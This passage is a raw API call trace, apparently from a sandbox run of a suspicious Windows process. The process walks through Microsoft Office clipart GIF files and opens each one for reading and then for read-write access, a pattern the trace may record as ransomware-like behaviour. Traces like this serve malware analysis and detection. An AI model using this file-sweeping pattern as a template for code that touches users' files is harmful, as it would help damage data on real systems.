Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 69 [0100.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.829] GetFileType (hFile=0x27c) returned 0x1 [0100.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0100.829] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.829] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.829] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.829] CloseHandle (hObject=0x27c) returned 1 [0100.829] AreFileApisANSI () returned 1 [0100.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0100.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 69 [0100.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.830] GetFileType (hFile=0x27c) returned 0x1 [0100.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0100.830] CloseHandle (hObject=0x27c) returned 1 [0100.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0100.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0100.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0100.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0100.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.831] AreFileApisANSI () returned 1 [0100.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0100.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 69 [0100.831] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2186)) returned 1 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0100.831] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.831] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.831] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x131e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00167_.GIF", cAlternateFileName="")) returned 1 [0100.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0100.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0100.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0100.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0100.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0100.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.832] AreFileApisANSI () returned 1 [0100.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0100.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.833] AreFileApisANSI () returned 1 [0100.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0100.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 69 [0100.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.833] GetFileType (hFile=0x27c) returned 0x1 [0100.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0100.833] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.833] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.833] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.834] CloseHandle (hObject=0x27c) returned 1 [0100.834] AreFileApisANSI () returned 1 [0100.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0100.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 69 [0100.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.834] GetFileType (hFile=0x27c) returned 0x1 [0100.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0100.834] CloseHandle (hObject=0x27c) returned 1 [0100.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.835] AreFileApisANSI () returned 1 [0100.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0100.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 69 [0100.836] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x131e)) returned 1 [0100.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0100.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0100.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.836] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14ff, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00169_.GIF", cAlternateFileName="")) returned 1 [0100.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0100.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0100.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0100.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0100.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 